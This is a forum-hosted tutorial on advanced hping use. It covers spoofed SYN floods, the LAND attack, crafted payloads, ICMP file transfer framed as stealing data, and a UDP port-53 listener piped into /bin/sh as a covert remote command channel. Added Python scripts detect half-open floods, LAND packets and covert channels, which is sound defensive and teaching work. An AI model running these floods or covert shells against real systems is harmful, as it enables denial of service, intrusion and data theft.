Do not use or republish, in whole or in part, without the consent of the Author. TheTAZZone policy is that Authors retain the rights to the work they submit and/or post. We do not sell, publish, transmit, or have the right to give permission for such; TheTAZZone merely retains the right to use, retain, and publish submitted work within its Network.

This paper is the work of The Master Jedi Pimpsor AKA thehorse13, who has kindly consented to it being hosted here on the TAZ.

I’d like to start by saying that I will be covering many of the basic functions along with examples and explanations of why you would want to use the tool in each scenario. In addition, I will hit on several advanced features for those who are familiar with the tool but not to the point where advanced knowledge of the application is grasped. I will be borrowing verbiage (in some cases) from the developer because I feel that the developer has worded things in such ways that I cannot improve upon. By no means is this a cut & paste tutorial, but I would like to make everyone aware that I will be borrowing info where it makes sense. For those who have been around here for a while, you know that I preface my tutorials with this advance warning in the event that someone finds a sentence or two from the original man pages for the app.

Advanced Techniques: Tutorial IIII
This tutorial will go into advanced features that HPING offers. Note that *any* of the following information can be used to take down hosts and possibly destroy information if misused. Always practice on lab hosts. I assume no responsibility for damages of *any* kind that may result from the use/misuse of the following information. By continuing to read this tutorial, you agree to use the information at your own risk.

NOTE: Real-world switches require a “double dash” instead of a single one. Because I wrote this in Word, they sometimes get fux0red when I paste in the content. Keep this in mind if an example doesn’t work for you on the first try.

Firewall Mapping: Traceroute/Firewalk Style
HPING can be used much like traceroute or firewalk, except that you choose whether the probes are TCP, UDP or ICMP packets. Let’s take a look at a TCP example…

NOTE: I have doctored the results heavily for example purposes.

[root@HorseyLand-Labs]# hping -V -I eth0 --bind -t 4 -S -p 666

-V verbose output
-I allows you to select the NIC used
--bind binds the TTL to the ctrl+z key combo, so that each time you hit ctrl+z the TTL increases
-t sets the initial TTL value in the header
-S SYN flag set
-p port

(eth0 S set, 40 headers + 0 data bytes
TTL 0 during transit from ip=
7: TTL 0 during transit from ip=

Each “TTL 0 during transit” line is the ICMP time-exceeded reply from the router at that hop. Once you reach your destination, you’ll see something like this:

len=46 ip= flags=SA DF seq=33 ttl=47 id=0 win=5840 rtt=4341.3

HPING: The DoS King

The point of this section is to give you a tool to test out IDS/firewall appliances as well as router/switch ACLs. Any numb nut can launch a DoS; only a professional can solve the issue when it is discovered.

** The SYN Attack **

In the next example, we will use the -a switch to spoof the source address of the attacking host. The SYN/ACK replies then go to the spoofed address instead of back to us, so our own kernel never answers them with a RST, which would otherwise let the target release each half-open connection.

[root@HorseyLand-Labs]# hping -a -S -p 80 -i u10000

You can set the packet rate using the -i (interval) switch. You can take a shortcut and use --fast, which uses 10000 microseconds and equates to 10 packets a second. You will not see *any* response on your host because the return traffic is going to the spoofed host. Keep in mind, this can either piss off the person whose address you spoofed or cause your net admin to have a stroke. Also, the target host may go down depending upon how fast and how many packets you send.

On our W2K3 host, we see a blizzard of SYN Received messages.

C:\>netstat -an -p tcp

Active Connections

Proto Local Address Foreign Address State

**SNIPPED** for brevity

Notice that the Foreign Address is the spoofed address you specified with the -a switch.
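A host-side check for the symptom above, added here as an example (it is not part of the original tutorial or of hping): parse the output of netstat -an -p tcp, count the connections stuck in SYN_RECEIVED per foreign host and per local port, and list the foreign addresses holding more than a threshold of them. The netstat listing inside the script is constructed to look like the Windows output snipped above; the addresses are placeholders.

```python
"""Count half-open TCP connections in `netstat -an -p tcp` output.

Added example, not part of the original tutorial or of hping.  The listing
below is constructed to look like the Windows netstat output the tutorial
snips; addresses are documentation-range placeholders.
"""
from collections import Counter

# Constructed sample: a web server receiving SYNs whose source address was
# spoofed with -a (198.51.100.7), plus two legitimate sessions.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    192.0.2.10:80          198.51.100.7:1025      SYN_RECEIVED
  TCP    192.0.2.10:80          198.51.100.7:1026      SYN_RECEIVED
  TCP    192.0.2.10:80          198.51.100.7:1027      SYN_RECEIVED
  TCP    192.0.2.10:80          198.51.100.7:1028      SYN_RECEIVED
  TCP    192.0.2.10:80          203.0.113.44:51002     ESTABLISHED
  TCP    192.0.2.10:3389        203.0.113.44:51010     ESTABLISHED
"""


def parse_netstat(text):
    """Yield (local, foreign, state) for each TCP row, skipping headers and blanks."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4 and parts[0].upper() == "TCP":
            yield parts[1], parts[2], parts[3]


def split_endpoint(endpoint):
    """'host:port' -> (host, port); rsplit so IPv6 literals keep their colons."""
    host, port = endpoint.rsplit(":", 1)
    return host, port


def half_open_summary(text):
    """Return (total half-open, Counter by foreign host, Counter by local port)."""
    by_host, by_port = Counter(), Counter()
    for local, foreign, state in parse_netstat(text):
        if state != "SYN_RECEIVED":
            continue
        by_host[split_endpoint(foreign)[0]] += 1
        by_port[split_endpoint(local)[1]] += 1
    return sum(by_host.values()), by_host, by_port


def flood_suspects(text, threshold=3):
    """Foreign hosts holding at least `threshold` half-open connections.

    Under a spoofed flood these are the -a addresses, not the real sender,
    so the list tells you what to filter, not whom to blame.
    """
    _, by_host, _ = half_open_summary(text)
    return sorted(host for host, n in by_host.items() if n >= threshold)


if __name__ == "__main__":
    total, by_host, by_port = half_open_summary(SAMPLE_NETSTAT)
    print("half-open connections:", total)
    print("by local port:", dict(by_port))
    print("suspects:", flood_suspects(SAMPLE_NETSTAT))
```

Run it periodically and compare the totals: a steady count of half-open connections against one port from addresses that never complete the handshake is the signature of the spoofed SYN attack, and the foreign hosts it names are the ones to block at the firewall while you look for the real sender.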

** LAND DoS Attack **

The idea behind this is quite simple: craft a packet that will connect a socket to itself. If successful, the box consumes all of its resources and a DoS condition results. This test is also VERY effective when testing spoofing rules on a firewall. Simply craft a packet using the -a switch and aim it at a host in the DMZ or internal LAN (this assumes that you have this information, legitimately of course), then check whether the firewall dropped the illegal packets. If not, start writing ACLs!!

Let’s try it out…

[root@HorseyLand-Labs]#hping -S -a -p 21
HPING (eth0 S set, 40 headers + 0 data bytes

Again, you’ll see no response, for reasons which should be very obvious by now. Most systems won’t fall victim to this anymore (like NT did), but again, it is very helpful in firewall rule testing.

Payload (Signatures): The True Art of Packet Crafting

We’re going to look at ways to use (misuse) HPING with an actual payload. The first example will deal with UDP payloads.

Fire up any editor and create a file with some kind of text. In my example, I created a file named payload.txt with the content of HAXOR. The file resides in the same directory where I am running HPING.

[root@HorseyLand-Labs]# hping -2 -p 7 -d 50 -E payload.txt

-2 puts HPING in UDP mode
-d specifies data length
-E tells HPING to use a signature from the specified file. The file can reside anywhere; however, you’ll need to use an absolute path (e.g. /root/data/haxorfiles/filename.tx) if the file isn’t in your current working directory.

Ethereal capture of the packet:

0000 00 a0 c9 df ff 84 00 c0 4f 48 aa 72 08 00 45 00 ........ OH.r..E.
0010 00 4e db e8 00 00 40 11 3d d1 ac 1d 04 3b ac 1d .N....@. =....;..
0020 04 70 04 34 00 35 00 3a a7 90 48 41 58 4f 52 0a .p.4.5.: ..HAXOR.
0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
0040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
0050 00 00 00 00 00 00 00 00 00 00 00 00 ........ ....
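To see what an IDS or firewall actually gets to work with, here is an added example (not from the tutorial or from hping) that rebuilds the raw frame from the Ethereal dump above, parses the Ethernet, IPv4 and UDP/TCP headers, verifies the IPv4 and UDP checksums, pulls out the payload and matches it against a content signature (HAXOR, the text from payload.txt). It also carries the check for the LAND packet from the previous section: source address and port equal to destination address and port. Note that the capture shows destination port 53 rather than the 7 on the command line (the author said the results were doctored); the parser reports whatever the bytes say.

```python
"""Decode the Ethereal hex dump above and inspect the packet the way an IDS would.

Added example, not from the tutorial or from hping.  It rebuilds the raw frame
from the dump, parses Ethernet/IPv4 and the UDP or TCP ports, verifies the IPv4
and UDP checksums, extracts the payload, matches it against a content
signature, and tests the LAND condition (source == destination address and
port).  HEXDUMP is the capture printed in the tutorial.
"""
import struct

HEXDUMP = """\
0000 00 a0 c9 df ff 84 00 c0 4f 48 aa 72 08 00 45 00 ........ OH.r..E.
0010 00 4e db e8 00 00 40 11 3d d1 ac 1d 04 3b ac 1d .N....@. =....;..
0020 04 70 04 34 00 35 00 3a a7 90 48 41 58 4f 52 0a .p.4.5.: ..HAXOR.
0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
0040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
0050 00 00 00 00 00 00 00 00 00 00 00 00 ........ ....
"""

HEX_DIGITS = set("0123456789abcdefABCDEF")


def hexdump_to_bytes(dump):
    """Rebuild raw bytes from 'OFFSET hh hh ... ascii' lines (16 bytes per line max)."""
    out = bytearray()
    for line in dump.splitlines():
        for tok in line.split()[1:17]:            # skip offset; at most 16 byte columns
            if len(tok) == 2 and set(tok) <= HEX_DIGITS:
                out.append(int(tok, 16))
            else:
                break                             # reached the ASCII column
    return bytes(out)


def rfc1071_checksum(data):
    """One's-complement sum of 16-bit words; 0 when `data` already contains a valid checksum."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_frame(raw):
    """Return a dict of Ethernet/IPv4/transport fields and the payload of one frame."""
    if struct.unpack("!H", raw[12:14])[0] != 0x0800:
        raise ValueError("not an IPv4 frame")
    ip = raw[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    ip = ip[:total_len]                           # drop any Ethernet padding
    proto = ip[9]
    transport = ip[ihl:]
    sport, dport = struct.unpack("!HH", transport[:4])
    info = {
        "src": ".".join(str(b) for b in ip[12:16]),
        "dst": ".".join(str(b) for b in ip[16:20]),
        "proto": proto, "sport": sport, "dport": dport,
        "ip_checksum_ok": rfc1071_checksum(ip[:ihl]) == 0,
    }
    if proto == 17:                               # UDP: 8-byte header, checksum over pseudo-header
        udp_len = struct.unpack("!H", transport[4:6])[0]
        pseudo = ip[12:20] + struct.pack("!BBH", 0, 17, udp_len)
        info["udp_checksum_ok"] = rfc1071_checksum(pseudo + transport[:udp_len]) == 0
        info["payload"] = transport[8:udp_len]
    elif proto == 6:                              # TCP: data offset in upper nibble of byte 12
        info["payload"] = transport[(transport[12] >> 4) * 4:]
    else:
        info["payload"] = transport
    return info


def matches_signature(info, signature):
    """Content match, the way an IDS rule with a 'content' option works."""
    return signature in info["payload"]


def is_land_packet(info):
    """LAND condition: source and destination address and port are identical."""
    return info["src"] == info["dst"] and info["sport"] == info["dport"]


if __name__ == "__main__":
    pkt = parse_frame(hexdump_to_bytes(HEXDUMP))
    print({k: v for k, v in pkt.items() if k != "payload"})
    print("payload:", pkt["payload"].rstrip(b"\x00"))
    print("HAXOR signature:", matches_signature(pkt, b"HAXOR"), "LAND:", is_land_packet(pkt))
```

Both checksums in the dump verify, so this really is the 50-byte UDP datagram that -d 50 produced, with HAXOR followed by a newline and 44 bytes of padding. A content rule on the string is the obvious match; a rule on the shape (a UDP datagram to port 7 or 53 whose payload is mostly NUL padding) catches the same packet when the string changes.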

As you can see, this could get very ugly with a little time and imagination. While I have given you enough information to be dangerous, I have not given you enough to be an outright menace. You’ll have to practice with the items learned in this series and before long, you’ll know exactly what I mean.

HPING: File Transfers Made Easy

Up until now, you have learned how to use HPING for testing purposes, but it has a whole additional set of features: file transfer.

The listen feature will put hping in listen mode for a specific signature. The signature is simply a string for which hping will listen, and it will parse everything in a packet after this signature. You can specify which protocol (ICMP, UDP or TCP) to listen for. Our example will use ICMP; you can experiment with TCP and UDP if you like. One *important* thing I will mention is that HPING doesn’t give a shit what is listening on a port. So if you play with TCP transfers, be sure that you don’t bind it to a port in use; otherwise, like a true vagrant, it will squat on that port and grab/send traffic until told otherwise.

Step one: set up the listener. There are two ways to do this: the safe way, where you set up HPING to listen for data from a specific host, or you can listen for traffic from any host. The safe method is achieved with the ever so surprising --safe switch. However, we won’t be using this method.

On the listening host: NOTE: “signature” refers to shared secret. It must be the same on the listening host and transferring host.

[root@HorseyLand-Labs]# hping -I eth0 --listen signature --icmp
hping2 listen mode

On the transferring host:

[root@CrackHouse]# hping -I eth0 --icmp -d 100 --sign signature --file /home/example

NOTE: The -d switch is important. Be sure it is large enough, because this is the value HPING uses to determine the data size.

Now, on your listening host, you will see the following appear (remember, this is the content of my file):

[root@HorseyLand-Labs]# hping -I eth0 --listen signature --icmp
hping2 listen mode

Wow, this is a nice way
To steel information if
The admin is asleep at
The wheel. I sure hope
That important information
Such as credit card #s
Aren’t in this file.

As you can see, the evil possibilities are endless.

HPING: A Trojan in disguise?

There is a file transfer technique that I did not cover in detail which will allow HPING to be set up as a full duplex channel across stateless filters. This is achieved by using the -SA switch along with a TCP transfer. You are quite capable of setting this up with the knowledge gained thus far, but because this is on AO, I cannot post the precise instructions. Anyway, let’s assume that we were able to set this connection up. You can execute commands on the remote machine. Yep, you read correctly.

I’ll simply provide the commands.

Local machine:
[root@HorseyLand-Labs]# hping -I eth0 --listen signature --udp -p 53 | /bin/sh
hping listen mode:

Remote Machine:
[root@CrackHouse]# echo ls > watchthis.cmd
[root@CrackHouse]# hping -p 53 -d 100 --udp --sign signature --file ./watchthis.cmd

The result: the ls sent from the remote machine is fed by the listener into /bin/sh, and the directory listing appears on your local machine:

[root@HorseyLand-Labs]# hping -I eth0 --listen signature --udp -p 53 | /bin/sh
hping listen mode:

Again, the possibilities are endless.
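What a network monitor can do about the two channels above (the ICMP file transfer and the UDP/53 command channel) is check whether the payload looks like the protocol it is riding on. The following is an added example, not from the tutorial or from hping: it compares ICMP echo payloads against the default fill patterns of common ping clients (Windows ping.exe’s fixed alphabet string; iputils/BSD ping’s timestamp followed by bytes whose value equals their offset) and runs a minimal DNS parse on UDP port-53 datagrams. A signature string followed by file contents or a shell command fails both tests. All sample payloads are constructed, and the DNS query builder exists only to produce a benign sample.

```python
"""Flag ICMP echo and UDP/53 payloads that do not look like ping or DNS.

Added example, not from the tutorial or hping.  Real ping clients fill echo
payloads with fixed patterns and real port-53 datagrams parse as DNS messages;
a payload that carries a signature string followed by file contents or a shell
command (the --listen/--sign channel, over ICMP or UDP/53) fails both tests.
Every sample payload below is constructed.
"""
import struct

WINDOWS_PING = b"abcdefghijklmnopqrstuvwabcdefghi"        # Windows ping.exe default data
LABEL_CHARS = set(b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_")


def looks_like_ping_payload(payload):
    """Windows default pattern, or the Linux/BSD layout: a timestamp (8 bytes on
    32-bit, 16 on 64-bit) followed by bytes whose value equals their offset."""
    if payload == WINDOWS_PING:
        return True
    return any(
        len(payload) > ts_len
        and all(payload[i] == (i & 0xFF) for i in range(ts_len, len(payload)))
        for ts_len in (8, 16)
    )


def looks_like_dns(payload):
    """Minimal DNS sanity check: 12-byte header, plausible counts, hostname-style question labels."""
    if len(payload) < 12:
        return False
    qd, an, ns, ar = struct.unpack("!HHHH", payload[4:12])
    if not 1 <= qd <= 4 or an > 64 or ns > 64 or ar > 64:
        return False
    pos = 12
    for _ in range(qd):
        while True:                               # walk the QNAME labels
            if pos >= len(payload):
                return False
            length = payload[pos]
            if length == 0:
                pos += 1
                break
            if length & 0xC0 == 0xC0:             # compression pointer ends the name
                pos += 2
                break
            label = payload[pos + 1:pos + 1 + length]
            if length > 63 or len(label) != length or not set(label) <= LABEL_CHARS:
                return False
            pos += 1 + length
        if pos + 4 > len(payload):                # QTYPE and QCLASS must follow
            return False
        pos += 4
    return True


def classify(kind, dport, payload):
    """'ok', or the reason a payload looks like a covert channel.  kind is 'icmp-echo' or 'udp'."""
    if kind == "icmp-echo" and not looks_like_ping_payload(payload):
        return "icmp echo payload does not match a known ping pattern"
    if kind == "udp" and dport == 53 and not looks_like_dns(payload):
        return "udp/53 datagram does not parse as DNS"
    return "ok"


def build_dns_query(name, txid=0x1234):
    """Constructed standard query for `name`, used only to produce a benign sample."""
    qname = b"".join(bytes([len(p)]) + p.encode() for p in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", 1, 1)


# Constructed samples.  hping -d 100 pads the data to 100 bytes, hence ljust.
LINUX_PING = bytes(16) + bytes(range(0x10, 0x38))                  # 56-byte default on 64-bit
ICMP_TRANSFER = (b"signature" + b"Wow, this is a nice way\n").ljust(100, b"\x00")
UDP53_COMMAND = (b"signature" + b"ls\n").ljust(100, b"\x00")


if __name__ == "__main__":
    samples = [("icmp-echo", None, LINUX_PING), ("icmp-echo", None, WINDOWS_PING),
               ("icmp-echo", None, ICMP_TRANSFER),
               ("udp", 53, build_dns_query("example.com")), ("udp", 53, UDP53_COMMAND)]
    for kind, dport, payload in samples:
        print(kind, dport, len(payload), "->", classify(kind, dport, payload))
```

The pattern checks are heuristics: a client with a custom -p fill or a resolver using unusual label characters will trip them, so treat a hit as something to look at, not block on. The size alone is also telling: the -d 100 payloads are longer than either default ping size, and a port-53 datagram whose header counts read as text is never a query.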

Well that wraps up tutorial 4. In the final installment, we will examine countermeasure techniques so that you can once again sleep at night!

Well, what do you all think so far?

By admin
